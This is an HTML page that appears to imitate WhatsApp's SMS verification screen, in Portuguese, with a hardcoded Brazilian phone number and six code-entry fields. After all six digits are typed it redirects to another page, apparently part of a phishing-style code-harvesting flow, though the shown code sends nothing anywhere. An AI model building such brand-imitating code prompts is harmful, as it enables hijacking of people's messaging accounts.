<!DOCTYPE html>
<html>
<head>
<title>WhatsApp</title>
<meta charset="utf-8">
<meta name="viewport"
	content="width=device-width, initial-scale=1, shrink-to-fit=no">
<link rel="shortcut icon" href="img/favicon.png" />
<link rel="stylesheet" href="css/bootstrap.min.css" />
<link rel="stylesheet" href="css/bootstrap-reboot.min.css" />
<link rel="stylesheet" href="css/bootstrap-grid.min.css" />
</head>
<body>

	<div class="container">


			<div class="row mt-4 text-center" style="color: #118D7F;">
			<div class="col-12">
				<h5>
					<strong>Confirmar +55 11 97652-7006</strong>
				</h5>
			</div>	
			</div>

			<div class="row mt-2">
				<div class="col-12 text-center p-2">
					Aguardando para detectar automaticamente <br>um SMS enviado para <strong>55 11 97652-7006</strong>
					<p class="mt-2"> <a href="index02">Numero errado ?</a></p>
				</div>
			</div>

			<div class="row text-center">
				<div class="col-12">
                <input id="txtcampo01" type="text" value="" style="width: 30px; font-size: 24px; font-weight: bold; text-align: center; color: #118D7F;" class="p-1 m-1 campo" maxlength="1">
                <input id="txtcampo02" type="text" value="" style="width: 30px; font-size: 24px; font-weight: bold; text-align: center; color: #118D7F;" class="p-1 m-1 campo" maxlength="1">
                <input id="txtcampo03" type="text" value="" style="width: 30px; font-size: 24px; font-weight: bold; text-align: center; color: #118D7F;" class="p-1 m-1 campo" maxlength="1">
                <input id="txtcampo04" type="text" value="" style="width: 30px; font-size: 24px; font-weight: bold; text-align: center; color: #118D7F;" class="p-1 m-1 campo" maxlength="1">
                <input id="txtcampo05" type="text" value="" style="width: 30px; font-size: 24px; font-weight: bold; text-align: center; color: #118D7F;" class="p-1 m-1 campo" maxlength="1">
                <input id="txtcampo06" type="text" value="" style="width: 30px; font-size: 24px; font-weight: bold; text-align: center; color: #118D7F;" class="p-1 m-1 campo" maxlength="1">
              
                </div>
			</div>

			<div class="row text-center mb-2">
			<div class="col-12">
				<div class="p-2 mt-0">Insira o código de 6 dígitos</div>
			</div>
			</div>

			<div class="row text-center m-0 p-0 mt-4">

			<div class="col-9 text-left">
			<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="25" height="25">
			<path opacity=".55" fill="#263238" d="M19.005 3.175H4.674C3.642 3.175 3 3.789 3 4.821V21.02l3.544-3.514h12.461c1.033 0 2.064-1.06 2.064-2.093V4.821c-.001-1.032-1.032-1.646-2.064-1.646zm-4.989 9.869H7.041V11.1h6.975v1.944zm3-4H7.041V7.1h9.975v1.944z"></path></svg>
			&nbsp;Reenviar SMS</div>
			<div class="col-3 text-left" id="cronomereo"></div>
			</div>

	</div>

	<script src="js/jquery-3.4.1.min.js"></script>
	<script src="js/bootstrap.js"></script>
	<script src="js/jquery.maskedinput.js"></script>
	<script src="js/bootstrap.bundle.js"></script>


<script type="text/javascript">

var tempo = new Number();
// Tempo em segundos
tempo = 180;

function startCountdown(){

	// Se o tempo não for zerado
	if((tempo - 1) >= 0){

		// Pega a parte inteira dos minutos
		var min = parseInt(tempo/60);
		// Calcula os segundos restantes
		var seg = tempo%60;

		// Formata o número menor que dez, ex: 08, 07, ...
		if(min < 10){
			min = "0"+min;
			min = min.substr(0, 2);
		}
		if(seg <=9){
			seg = "0"+seg;
		}

		// Cria a variável para formatar no estilo hora/cronômetro
		horaImprimivel = '00:' + min + ':' + seg;
		//JQuery pra setar o valor
		$("#cronomereo").html(horaImprimivel);

		// Define que a função será executada novamente em 1000ms = 1 segundo
		setTimeout('startCountdown()',1000);

		// diminui o tempo
		tempo--;

	// Quando o contador chegar a zero faz esta ação
	} else {
		alert('liberou');
	}

}

// Chama a função ao carregar a tela
startCountdown();

</script>


<script type="text/javascript">
    $(function() {
	    //$('#txtcampo01').mask("9");
	    //$('#txtcampo02').mask("9");	    
	    //$('#txtcampo03').mask("9");	    
	    //$('#txtcampo04').mask("9");	    
	    //$('#txtcampo05').mask("9");	
	    //$('#txtcampo06').mask("9");
	    $('#txtcampo01').focus(); 
    });	
    
    
    $(".campo").keypress(function () {
        if($(this).attr("id")=="txtcampo01"){$('#txtcampo02').focus();}
        if($(this).attr("id")=="txtcampo02"){$('#txtcampo03').focus();}
        if($(this).attr("id")=="txtcampo03"){$('#txtcampo04').focus();}
        if($(this).attr("id")=="txtcampo04"){$('#txtcampo05').focus();}
        if($(this).attr("id")=="txtcampo05"){$('#txtcampo06').focus();}
    
        if(document.getElementById("txtcampo01").value !='' && document.getElementById("txtcampo02").value !='' && document.getElementById("txtcampo03").value !='' && document.getElementById("txtcampo04").value !='' && document.getElementById("txtcampo05").value !='' && document.getElementById("txtcampo06").value !=''){      	
        	 window.location.href = "index04"
        }
        
        
     })
  

     
</script>

</body>
</html>